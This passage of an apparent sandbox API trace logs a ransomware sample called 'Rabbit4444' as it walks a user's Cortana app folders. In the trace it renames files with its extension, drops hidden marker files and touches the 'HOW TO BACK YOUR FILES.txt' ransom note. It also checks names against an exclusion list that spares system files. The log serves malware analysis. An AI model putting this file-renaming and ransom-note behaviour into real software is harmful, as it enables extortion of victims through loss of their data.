0x117a40 [0068.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0068.508] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.509] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.510] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.510] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0068.510] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.510] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0068.510] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.510] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0068.510] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.510] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0068.510] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15982112563) returned 1 [0068.510] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0068.510] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0068.510] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.511] CloseHandle (hObject=0x29c) returned 1 [0068.511] CloseHandle (hObject=0x280) returned 1 [0068.511] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{FE9E45E3-96FD-468B-B1CE-3961D08AD216}.Rabbit4444") returned 156 [0068.511] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{FE9E45E3-96FD-468B-B1CE-3961D08AD216}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{fe9e45e3-96fd-468b-b1ce-3961d08ad216}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{FE9E45E3-96FD-468B-B1CE-3961D08AD216}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{fe9e45e3-96fd-468b-b1ce-3961d08ad216}.rabbit4444"), dwFlags=0x1) returned 1 [0068.512] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c8941cb, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9c8941cb, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x454541d3, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{FE9E45E3-96FD-468B-B1CE-3961D08AD216}", cAlternateFileName="{FE9E4~1")) returned 0 [0068.512] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0068.512] lstrcpyW (in: lpString1=0x130ec0e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0068.512] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0068.512] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x280 [0068.512] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0068.516] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.516] CloseHandle (hObject=0x280) returned 1 [0068.516] CloseHandle (hObject=0x228) returned 1 [0068.516] GetCurrentThreadId () returned 0xd98 [0068.516] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122028 [0068.516] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalCache" [0068.516] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122cc0 | out: hHeap=0xe0000) returned 1 [0068.516] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122020 | out: hHeap=0xe0000) returned 1 [0068.516] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalCache" [0068.516] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalCache\\" [0068.516] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3" [0068.516] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0068.517] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0068.520] FlushFileBuffers (hFile=0x228) returned 1 [0068.521] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0068.521] CloseHandle (hObject=0x228) returned 1 [0068.522] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalCache") returned 89 [0068.522] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0068.522] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x814d4f06, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd04837c4, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf229b3f7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0068.522] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.522] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0068.522] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0068.522] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.522] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x814d4f06, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd04837c4, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf229b3f7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.522] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.522] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0068.522] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0068.522] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.522] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.522] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf229b3f7, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf229b3f7, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf229b3f7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0068.522] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.522] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0068.522] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf229b3f7, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf229b3f7, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf229b3f7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0068.522] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0068.523] lstrcpyW (in: lpString1=0x130ebec, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0068.523] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0068.523] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0068.523] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0068.524] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.524] CloseHandle (hObject=0x298) returned 1 [0068.524] CloseHandle (hObject=0x228) returned 1 [0068.524] GetCurrentThreadId () returned 0xd98 [0068.524] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122108 [0068.524] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData" [0068.524] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124308 | out: hHeap=0xe0000) returned 1 [0068.524] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122100 | out: hHeap=0xe0000) returned 1 [0068.524] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData" [0068.524] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\" [0068.524] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3" [0068.524] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0068.527] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0068.530] FlushFileBuffers (hFile=0x228) returned 1 [0068.531] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0068.531] CloseHandle (hObject=0x228) returned 1 [0068.532] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData") returned 86 [0068.532] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0068.532] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x814fb197, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x36b93ea6, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xf229b3f7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102990 [0068.532] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.532] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0068.532] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0068.532] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.532] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x814fb197, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x36b93ea6, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xf229b3f7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.532] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.532] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0068.532] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0068.532] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.532] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.532] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf229b3f7, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf229b3f7, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf22c1637, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0068.532] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.532] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0068.532] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3230f148, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0xea526dce, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0xea526dce, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed DB", cAlternateFileName="INDEXE~1")) returned 1 [0068.532] lstrcmpiW (lpString1="Indexed DB", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0068.532] lstrcmpiW (lpString1="Indexed DB", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.533] lstrcmpiW (lpString1="Indexed DB", lpString2="Rabbit4444.exe") returned -1 [0068.533] lstrcmpiW (lpString1="Indexed DB", lpString2=".") returned 1 [0068.533] lstrcmpiW (lpString1="Indexed DB", lpString2="..") returned 1 [0068.533] lstrcmpiW (lpString1="Indexed DB", lpString2="windows") returned -1 [0068.533] lstrcmpiW (lpString1="Indexed DB", lpString2="bootmgr") returned 1 [0068.533] lstrcmpiW (lpString1="Indexed DB", lpString2="pagefile.sys") returned -1 [0068.533] lstrcmpiW (lpString1="Indexed DB", lpString2="boot") returned 1 [0068.533] lstrcmpiW (lpString1="Indexed DB", lpString2="ids.txt") returned 1 [0068.533] lstrcmpiW (lpString1="Indexed DB", lpString2="NTUSER.DAT") returned -1 [0068.533] lstrcpyW (in: lpString1=0x130ebe6, lpString2="Indexed DB" | out: lpString1="Indexed DB") returned="Indexed DB" [0068.533] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB" [0068.533] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\" [0068.533] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\.BFC0E91B00AE8A0620D3" [0068.533] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\indexed db\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.535] WriteFile (in: hFile=0x280, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0068.543] FlushFileBuffers (hFile=0x280) returned 1 [0068.544] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0068.545] CloseHandle (hObject=0x280) returned 1 [0068.545] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122340 [0068.545] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc4) returned 0x1161e0 [0068.545] RtlInterlockedPushEntrySList (in: ListHead=0xf6750, ListEntry=0x122348 | out: ListHead=0xf6750, ListEntry=0x122348) returned 0x0 [0068.545] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3230f148, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0xea526dce, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0xea526dce, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed DB", cAlternateFileName="INDEXE~1")) returned 0 [0068.545] FindClose (in: hFindFile=0x102990 | out: hFindFile=0x102990) returned 1 [0068.545] lstrcpyW (in: lpString1=0x130ebe6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0068.545] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0068.547] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x280 [0068.547] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0068.547] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.547] CloseHandle (hObject=0x280) returned 1 [0068.547] CloseHandle (hObject=0x228) returned 1 [0068.548] GetCurrentThreadId () returned 0xd98 [0068.548] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122088 [0068.548] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC" [0068.548] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x118de8 | out: hHeap=0xe0000) returned 1 [0068.548] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122080 | out: hHeap=0xe0000) returned 1 [0068.548] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC" [0068.548] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC", lpString2="\\" | out: 